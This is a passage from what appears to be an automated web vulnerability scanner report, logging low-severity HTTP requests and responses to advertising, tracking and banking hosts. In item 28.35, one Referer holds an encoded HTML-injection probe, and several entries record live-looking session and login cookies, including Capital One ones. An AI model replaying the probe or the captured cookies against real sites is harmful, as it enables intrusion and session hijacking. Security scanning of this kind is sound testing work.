Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-discovery-green_js&format=120x600_as&output=html&h=600&w=120&lmt=1311446613&channel=TreeHugger_Domain&ad_type=text_image&color_bg=f0f0f0&color_border=f0f0f0&color_link=4E5D76&color_text=000000&color_url=4E5D76&flash=10.3.181&url=http%3A%2F%2Fwww.treehugger.com%2Fscience_technology%2F%3Fcampaign%3Dth_nav_scitech&dt=1311428613242&bpp=2&shv=r20110713&jsv=r20110627&prev_fmts=120x90_0ads_al_s&correlator=1311428613403&pv_ch=TreeHugger_Domain%2B&frm=4&adk=2317484887&ga_vid=1241005680.1311427153&ga_sid=1311427153&ga_hid=521257110&ga_fc=1&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=6&u_nmime=40&biw=932&bih=829&ref=http%3A%2F%2Fwww.treehugger.com%2Ftravel_nature%2F%3Fcampaign%3Dth_nav_travel&fu=0&ifi=2&dtd=784&xpc=sm8TDhnWhF&p=http%3A//www.treehugger.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=381be2a5a4e321de:U=17ea5243225a615b:FF=0:TM=1305295666:LM=1306388828:GM=1:S=c4JmgYF7VRiR-ADW; NID=49=W8r0AKxd5wk5CX1jyfDbNGqu0gNP9tvrFwquFIFVcdigP0YfOxWLbqIT-uh0HQif4kRtxM0Zmnl6hxXO7elxBhi5M5Shuv0bLm6MSaba7TZWWydFwvwYYpn2fEzjfe3s

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Type: text/html
Last-Modified: Wed, 25 May 2011 00:42:54 GMT
Date: Sat, 23 Jul 2011 13:43:47 GMT
Expires: Sat, 23 Jul 2011 13:43:47 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 216
X-XSS-Protection: 1; mode=block

<!DOCTYPE html>
<html>
<head>
<title></title>
<meta http-equiv='refresh' content='0;URL=iframe.html' />
</head>

<body>
<script type=text/javascript>document.location.replace('iframe.html');</script>

...[SNIP]...

28.29. http://scripts.chitika.net/static/hq/lifescript.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://scripts.chitika.net
Path:	/static/hq/lifescript.js

Request

GET /static/hq/lifescript.js HTTP/1.1
Host: scripts.chitika.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/Health/Conditions/ADD/How_to_Quiet_the_Symptoms_of_Adult_ADHD.aspx?utm_source=outbrain&utm_medium=cpc&utm_campaign=ADHD_Adult

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.1.6
Content-Type: text/html
Content-Length: 49
Cache-Control: max-age=20542
Expires: Fri, 22 Jul 2011 01:05:40 GMT
Date: Thu, 21 Jul 2011 19:23:18 GMT
Connection: close
Vary: Accept-Encoding

function ch_hq_execute() {
ex_normal_op();
}

28.30. https://servicing.capitalone.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://servicing.capitalone.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: servicing.capitalone.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=FB8DCF93533EFDA4; caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0400; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DA; __utma=106121180.767001896.1311366537.1311366537.1311366537.1; __utmb=106121180.1.10.1311366537; __utmc=106121180; __utmz=106121180.1311366537.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); LP_GROUP=49; caponesn=af558df5VY%2FBjsIwDET%2FJXckO1C2dU9oJY574ANauWlEi0pSJbkA5d%2FXLblw8pNnPBpf7HX0rolUkvrjJMyTqhvnnV0MzzKMEVUfSZ3OZ9IAJRxA79IVcKcBEY5QyQEWBVRL2NJ4eo6z8b2Vw4IUAiBsln1RLu3sQ%2BKp%2FVjbp%2FllM9iGCekVCQ%2FZv2YDVKhVzRLy2pK6foxJ1ZH2pKRIpsl3K4keOmf6zDFxsitrUu6Rl3e%2B%2BZDZSY9hZXmtC%2BzM8C2839IYf6p%2F; lpVsGroupTracker=ndb; itc=CAPITALONE11NZZZDN1QSWZD4; mbox=check#true#1311366883|session#1311366822807-148063#1311368683|disable#browser%20timeout#1311370442; ASP.NET_SessionId=t40lmqeexjtjkkvhq4caiv55; COUNTRYCODE=USA; TestCookie=OK; ssotgt=f2eos; C1_REDIRECT=; SSP_Params=; VS_COOKIE=Login

Response

HTTP/1.1 404 Not Found
Content-Length: 103
Content-Type: text/html
Server: Microsoft-IIS/6.0
Date: Fri, 22 Jul 2011 20:36:28 GMT
Connection: close

<html><head><title>Error</title></head><body>The system cannot find the file specified.
</body></html>

28.31. http://showadsak.pubmatic.com/AdServer/AdServerServlet previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://showadsak.pubmatic.com
Path:	/AdServer/AdServerServlet

Request

GET /AdServer/AdServerServlet?operId=2&pubId=25659&siteId=26922&adId=21908&kadwidth=728&kadheight=90&kbgColor=&ktextColor=&klinkColor=&pageURL=http://www.myyearbook.com/advertising/default.php&frameName=http_www_myyearbook_comadvertisingdefault_phpkomli_ads_frame12565926922&kltstamp=2011-6-21%2013%3A1%3A0&ranreq=0.5989337249714323&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.myyearbook.com/advertising/default.php?n=TribalFusion&section=None&size=728x90&site=MYB&sub=Network
Cookie: KRTBCOOKIE_148=1699-uid:E3F32BD09546C94DAD95D1B540110C; KADUSERCOOKIE=ED7381A8-F9AB-49E0-BC2C-2A944C186892; __utmz=103266945.1305207252.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=103266945.1788404461.1305207252.1305207252.1305207252.1; KRTBCOOKIE_32=1386-WH9qZFd2QnVEAmJeAgd%2FWAJUaXsQdwNPC11gUlpOZQ%3D%3D; PUBRETARGET=2114_1326806725.82_1405863486; KRTBCOOKIE_22=488-pcv:1|uid:4146544210108361256

Response

28.32. http://static.addtoany.com/menu/sm3.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.addtoany.com
Path:	/menu/sm3.html

Request

GET /menu/sm3.html HTTP/1.1
Host: static.addtoany.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/

Response

HTTP/1.1 200 OK
Server: nginx/0.8.36
Date: Fri, 22 Jul 2011 20:15:04 GMT
Content-Type: text/html
Connection: keep-alive
Last-Modified: Thu, 05 May 2011 08:10:42 GMT
ETag: "6baaa99-349-4a282e8cc6480"
P3P: CP="ALL DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT"
Cache-Control: max-age=315360000
Age: 16576
Via: 1.1 vhost.phx1.nearlyfreespeech.net:3128 (squid/2.7.STABLE7)
X-Cache: HIT
Content-Length: 841

<!doctype html><html><head><title></title></head><body style="background-color:transparent"><script>_gaUserPrefs=null;document.write(unescape("%3Cscript src='"+(("https:"==document.location.protocol)?
...[SNIP]...

28.33. http://support.klout.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://support.klout.com
Path:	/

Request

GET /?from=ks HTTP/1.1
Host: support.klout.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: useBeta=1; forcedBeta=1; arrival_cookie=98b56134fc99bed15f2fd5a80818ad795283fd8c129697d9e64225945a634518a599f407fbb43ecf4a658b9ddf1a7db104c0d63b0746cfa03aaae1ab863abc117bdbb02d3db71de68697ce8ebe3b140cc694f4b6b9ac4bf3e11f81dffb4fbe1533cd73f68e028d22f98ab3055e53149c2adff152894de28de8dcf45425320dd945ad7c826560b357796ca6dc6d533ba78ba27924bdfc3a27ae4551253c31a845794d816ada889934d5f388625fc9e08a450fa5909e6636d6f9b6142468d27d5d3cc846223b4e70019c67a324da173d7e2040d7a91ae12b06d845ee0ecfc1a68b; __qca=P0-2053982506-1311432752930; __unam=c3eadea-131577bf952-48e618ce-1; __utma=261428178.226286795.1311432753.1311432753.1311432753.1; __utmb=261428178.6.10.1311432753; __utmc=261428178; __utmz=261428178.1311432753.1.1.utmcsr=klout.com|utmccn=(referral)|utmcmd=referral|utmcct=/home

Response

HTTP/1.1 503 Service Temporarily Unavailable
Content-Type: text/html
Date: Sat, 23 Jul 2011 14:53:07 GMT
Server: nginx
Content-Length: 2026
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...

28.34. http://support.klout.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://support.klout.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: support.klout.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: useBeta=1; forcedBeta=1; arrival_cookie=98b56134fc99bed15f2fd5a80818ad795283fd8c129697d9e64225945a634518a599f407fbb43ecf4a658b9ddf1a7db104c0d63b0746cfa03aaae1ab863abc117bdbb02d3db71de68697ce8ebe3b140cc694f4b6b9ac4bf3e11f81dffb4fbe1533cd73f68e028d22f98ab3055e53149c2adff152894de28de8dcf45425320dd945ad7c826560b357796ca6dc6d533ba78ba27924bdfc3a27ae4551253c31a845794d816ada889934d5f388625fc9e08a450fa5909e6636d6f9b6142468d27d5d3cc846223b4e70019c67a324da173d7e2040d7a91ae12b06d845ee0ecfc1a68b; __qca=P0-2053982506-1311432752930; __unam=c3eadea-131577bf952-48e618ce-1; __utma=261428178.226286795.1311432753.1311432753.1311432753.1; __utmb=261428178.6.10.1311432753; __utmc=261428178; __utmz=261428178.1311432753.1.1.utmcsr=klout.com|utmccn=(referral)|utmcmd=referral|utmcct=/home

Response

HTTP/1.1 503 Service Temporarily Unavailable
Content-Type: text/html
Date: Sat, 23 Jul 2011 14:53:12 GMT
Server: nginx
Content-Length: 2026
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...

28.35. http://switch.atdmt.com/jaction/CODB_IOC_Overview/v3/atz.FB8DCF93533EFDA4 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://switch.atdmt.com
Path:	/jaction/CODB_IOC_Overview/v3/atz.FB8DCF93533EFDA4

Request

GET /jaction/CODB_IOC_Overview/v3/atz.FB8DCF93533EFDA4? HTTP/1.1
Host: switch.atdmt.com
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/directbanking/online-checking-accounts/interest-online-checking-account/?linkid=WWW_Z_Z_Z__C2_01_T_SP1ca646%252522%25253E%25253Ca%25253E91c2cd96a28
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1305305557-4079447; ach00=903d/120af:6cf8/2750d:d99f/1afe8:bab9/11176:ba67/1c4e:f594/1c01f:66c2/39a1:66c2/3877:66c2/2b295:66c2/2b2a3; ach01=ce81a74/120af/134f208a/903d/4dd2907e:cf0807d/2750d/135a6ad5/6cf8/4de0ff1b:8a892c1/1afe8/bfedd64/d99f/4de0ffc1:a34fe32/11176/ab3574a/bab9/4de6e487:224f750/1c4e/4919ce6/ba67/4de6e67b:421378c/1c01f/825b020/f594/4de7e7e5:421378c/1c01f/8b4ca16/f594/4de7e7e7:421378c/1c01f/88b46ce/f594/4de7ecb3:c62bb85/39a1/123ee4af/66c2/4dfffb75:c388719/39a1/1235b344/66c2/4e008e93:c3ee9ca/3877/123ee6eb/66c2/4e008f9b:d42f8c5/2b295/13d4144a/66c2/4e178c27:d4250f2/2b2a3/13d2744e/66c2/4e262efc; MUID=E361C23374E642C998D8ABA7166A75EC

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Fri, 22 Jul 2011 20:30:57 GMT
Connection: close
Content-Length: 2997

function AT_tags(){
try{var tags = new Array();
var imgs = new Array();
tags = ['http://spe.atdmt.com/images/pixel.gif','http://at.amgdgt.com/ads/?t=pp&px=11750&rnd=%%Cache_buster%%','htt
...[SNIP]...

28.36. http://switch.atdmt.com/jaction/CODB_IPOS_OpenAccount/v3/atz.FB8DCF93533EFDA4 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://switch.atdmt.com
Path:	/jaction/CODB_IPOS_OpenAccount/v3/atz.FB8DCF93533EFDA4

Request

GET /jaction/CODB_IPOS_OpenAccount/v3/atz.FB8DCF93533EFDA4? HTTP/1.1
Host: switch.atdmt.com
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/directbanking/online-savings-accounts/interestplus-online-savings-account/open-account/?linkid=WWW_Z_NDB_A65A9B0C0D704AE0F0G708F_SP1_C4_02_T_SP29OA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1305305557-4079447; ach00=903d/120af:6cf8/2750d:d99f/1afe8:bab9/11176:ba67/1c4e:f594/1c01f:66c2/39a1:66c2/3877:66c2/2b295:66c2/2b2a3; ach01=ce81a74/120af/134f208a/903d/4dd2907e:cf0807d/2750d/135a6ad5/6cf8/4de0ff1b:8a892c1/1afe8/bfedd64/d99f/4de0ffc1:a34fe32/11176/ab3574a/bab9/4de6e487:224f750/1c4e/4919ce6/ba67/4de6e67b:421378c/1c01f/825b020/f594/4de7e7e5:421378c/1c01f/8b4ca16/f594/4de7e7e7:421378c/1c01f/88b46ce/f594/4de7ecb3:c62bb85/39a1/123ee4af/66c2/4dfffb75:c388719/39a1/1235b344/66c2/4e008e93:c3ee9ca/3877/123ee6eb/66c2/4e008f9b:d42f8c5/2b295/13d4144a/66c2/4e178c27:d4250f2/2b2a3/13d2744e/66c2/4e262efc; MUID=E361C23374E642C998D8ABA7166A75EC

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Fri, 22 Jul 2011 20:33:11 GMT
Connection: close
Content-Length: 3202

function AT_tags(){
try{var tags = new Array();
var imgs = new Array();
tags = ['http://spe.atdmt.com/images/pixel.gif','https://at.amgdgt.com/ads/?t=pp&px=11750&rnd=%%Cache_buster%%','ht
...[SNIP]...

28.37. http://switch.atdmt.com/jaction/COF_Sav_Homepage/v3/atz.FB8DCF93533EFDA4 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://switch.atdmt.com
Path:	/jaction/COF_Sav_Homepage/v3/atz.FB8DCF93533EFDA4

Request

GET /jaction/COF_Sav_Homepage/v3/atz.FB8DCF93533EFDA4? HTTP/1.1
Host: switch.atdmt.com
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/directbanking/?linkid=WWW_Z_NDB_A6A58_SP30_C1_01_T_SP1SP1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1305305557-4079447; ach00=903d/120af:6cf8/2750d:d99f/1afe8:bab9/11176:ba67/1c4e:f594/1c01f:66c2/39a1:66c2/3877:66c2/2b295:66c2/2b2a3; ach01=ce81a74/120af/134f208a/903d/4dd2907e:cf0807d/2750d/135a6ad5/6cf8/4de0ff1b:8a892c1/1afe8/bfedd64/d99f/4de0ffc1:a34fe32/11176/ab3574a/bab9/4de6e487:224f750/1c4e/4919ce6/ba67/4de6e67b:421378c/1c01f/825b020/f594/4de7e7e5:421378c/1c01f/8b4ca16/f594/4de7e7e7:421378c/1c01f/88b46ce/f594/4de7ecb3:c62bb85/39a1/123ee4af/66c2/4dfffb75:c388719/39a1/1235b344/66c2/4e008e93:c3ee9ca/3877/123ee6eb/66c2/4e008f9b:d42f8c5/2b295/13d4144a/66c2/4e178c27:d4250f2/2b2a3/13d2744e/66c2/4e262efc; MUID=E361C23374E642C998D8ABA7166A75EC

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Fri, 22 Jul 2011 20:31:54 GMT
Connection: close
Content-Length: 3551

function AT_tags(){
try{var tags = new Array();
var imgs = new Array();
tags = ['http://spe.atdmt.com/images/pixel.gif','https://at.amgdgt.com/ads/?t=pp&px=11750&rnd=%%Cache_buster%%','ht
...[SNIP]...

28.38. http://tag.admeld.com/ad/iframe/610/bostonglobe/728x90/bg_1064637_61606220 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tag.admeld.com
Path:	/ad/iframe/610/bostonglobe/728x90/bg_1064637_61606220

Request

GET /ad/iframe/610/bostonglobe/728x90/bg_1064637_61606220?t=1311428802392&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.boston.com%2Flifestyle%2Farticles%2F2011%2F07%2F23%2Ffacebook_twitter_obligations_persist_during_vacations%2F%3Fp1%3DUpbox_links&refer= HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/?p1=Upbox_links
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=d96a784e-8901-47de-9dd1-4f91acb31514; __qca=P0-1342016851-1308225219551; D41U=3ldWxSUW5smmT8Cr1TVsp8odr2wpaUd4kIG9UWzIHns3qOaGxdAxaGw

Response

28.39. http://trk.etrigue.com/track.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://trk.etrigue.com
Path:	/track.php

Request

GET /track.php?ie=1&a790=&b790=&a790exit=&a=790&c=8&callback=etrigue1311365721230 HTTP/1.1
Host: trk.etrigue.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.paloaltonetworks.com/cam/switch/index.php?ts=scmag

Response

HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Powered-By: ASP.NET
Date: Fri, 22 Jul 2011 19:55:55 GMT
Content-Length: 26

etrigue1311365721230=null;

28.40. http://w55c.net/ct/cms-2-frame.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://w55c.net
Path:	/ct/cms-2-frame.html

Request

GET /ct/cms-2-frame.html?admeld_user_id=22e7a59d-553a-4d2e-a8a1-6434f26cd599&admeld_adprovider_id=260&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: w55c.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/adcontrol.htm?adj/lfs2.lifescript/conditions;path=health/conditions/add/out_of_control_it_could_be_adhd;contentid=b57d2ce1;abr=!webtvs;tax=adhd_adult;tax=adhd;tax=adhd;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=2;tile=6;sz=728x90;ord=707503625482983
Cookie: wfivefivec=0892d3fc-c93f-4985-8ab2-420c545c19b6

Response

HTTP/1.1 200 OK
Cache-Control: max-age=3600
Expires: Thu, 21 Jul 2011 20:29:53 GMT
Vary: Accept-Encoding
Last-Modified: Tue, 12 Jul 2011 19:30:13 GMT
ETag: "1548528128"
Content-Type: text/html
Accept-Ranges: bytes
Content-Length: 3875
Connection: close
Date: Thu, 21 Jul 2011 19:29:53 GMT
Server: w55c.net

<html>
<head>
<script type="text/javascript">

var cookie='wfivefivec',
   domain='w55c.net',
   cookiePrefix='match',
   pingURL='http://i.w55c.net/ping_match.gif',
   pixels=[],
   matchersConfig=[

...[SNIP]...

28.41. http://web2.checkm8.com/adam/detect previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://web2.checkm8.com
Path:	/adam/detect

Request

GET /adam/detect?cat=haymarketmedia.SCMagazineUS&page=841619005377563&serial=1000:1:A&&LOC=http://www.scmagazineus.com/&WIDTH=1039&HEIGHT=733&WIDTH_RANGE=WR_D&DATE=01110722&HOUR=15&RES=RS21&ORD=43659126423120664&req=x&pos=004671820390295345&&&id=442705&click=http://ad.doubleclick.net/click%253Bh%253Dv8/3b4c/3/0/%252a/z%253B242418662%253B0-0%253B1%253B37430148%253B1412-640/480%253B42633033/42650820/1%253B%253B%257Esscs%253D%253f&ad_play= HTTP/1.1
Host: web2.checkm8.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 20:14:06 GMT
Server: Apache
P3P: policyref="http://web2.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.24 ny-ad14
Set-cookie: cm8dccp=1311365646;Path=/;Expires=Sat, 23-Jul-2011 20:14:06 GMT;
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 697
Connection: close
Content-Type: text/html

window.CM8DispatcherApps=window.CM8DispatcherApps||[];
window.CM8DispatcherApps.push('http://web2.checkm8.com/adam/detected?cat=haymarketmedia.SCMagazineUS&page=841619005377563&serial=1000:1:A&&LOC=ht
...[SNIP]...

28.42. http://www.boston.com/newsprojects/widgets/twitter/get_tweet_count.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.boston.com
Path:	/newsprojects/widgets/twitter/get_tweet_count.php

Request

GET /newsprojects/widgets/twitter/get_tweet_count.php?bcom_url=http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations HTTP/1.1
Host: www.boston.com
Proxy-Connection: keep-alive
Referer: http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/?p1=Upbox_links
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW804GIB4AATB3; s_vi=[CS]v1|2703101A8516139C-400001A3C00CA954[CE]; anonId=c78dd2a2-2fd6-478d-a9a0-c99ad34539e3; _chartbeat2=2gl4d8yk23g2sl2m; mbox=check#true#1311428842|session#1311428781592-195064#1311430642|level#10#1321796782|traffic#true#1321796782|PC#1311428781592-195064.17#1312638385; __unam=b6206f2-130c7ed914a-12883c53-5; bcpage=6; RMFD=011QkcXHO1060Og; sslife=1; s_cc=true; s_pv=Lifestyle%20%7C%20Other%20%7C%20Facebook%2C%20Twitter%20obligations%20persist%20during%20vacations; s_sq=%5B%5BB%5D%5D; AxData=; Axxd=1

Response

HTTP/1.1 200 OK
Date: Sat, 23 Jul 2011 13:49:02 GMT
Server: Apache/2.2.3 (CentOS) PHP/5.2.17
X-Powered-By: PHP/5.2.17
Served-By: sophiapetrillo
Content-Length: 29
Content-Type: text/html
Set-Cookie: bcpage=6;expires=Sun, 26-Jun-2016 13:49:07 GMT;path=/;domain=boston.com;

{"count":12,"shortUrl":false}

28.43. http://www.everestjs.net/static/ad_if_c.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.everestjs.net
Path:	/static/ad_if_c.html

Request

GET /static/ad_if_c.html HTTP/1.1
Host: www.everestjs.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/adcontrol.htm?adj/lfs2.lifescript/conditions;path=health/conditions/add/out_of_control_it_could_be_adhd;contentid=b57d2ce1;abr=!webtvs;tax=adhd_adult;tax=adhd;tax=adhd;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=2;tile=6;sz=728x90;ord=707503625482983

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "cdc64186c07483caba3effb23a131c62:1307392653"
Last-Modified: Mon, 06 Jun 2011 20:37:33 GMT
Accept-Ranges: bytes
Content-Type: text/html
Vary: Accept-Encoding
Date: Thu, 21 Jul 2011 19:30:08 GMT
Content-Length: 486
Connection: close

<html><script src="http://www.everestjs.net/static/st.beta.js#no_exec=1"></script><script language="javascript"> var a=__qu.gck,b="1day",c=__qu.url?__qu.url:"http://tag.admeld.com",b=a==__qu.efck?"1da
...[SNIP]...

28.44. http://www.hitcon.org/hit2011/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hitcon.org
Path:	/hit2011/

Request

Response

HTTP/1.0 200 OK
Date: Fri, 22 Jul 2011 08:13:54 GMT
Server: Apache/2.2.9
Last-Modified: Fri, 22 Jul 2011 07:16:28 GMT
ETag: "230227-2eda-4a8a33e778b00"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 11994
Content-Type: text/html
Age: 3775
X-Cache: HIT from cuisinart.iis.sinica.edu.tw
X-Cache-Lookup: HIT from cuisinart.iis.sinica.edu.tw:80
Via: 1.0 cuisinart.iis.sinica.edu.tw:80 (squid/2.6.STABLE21)
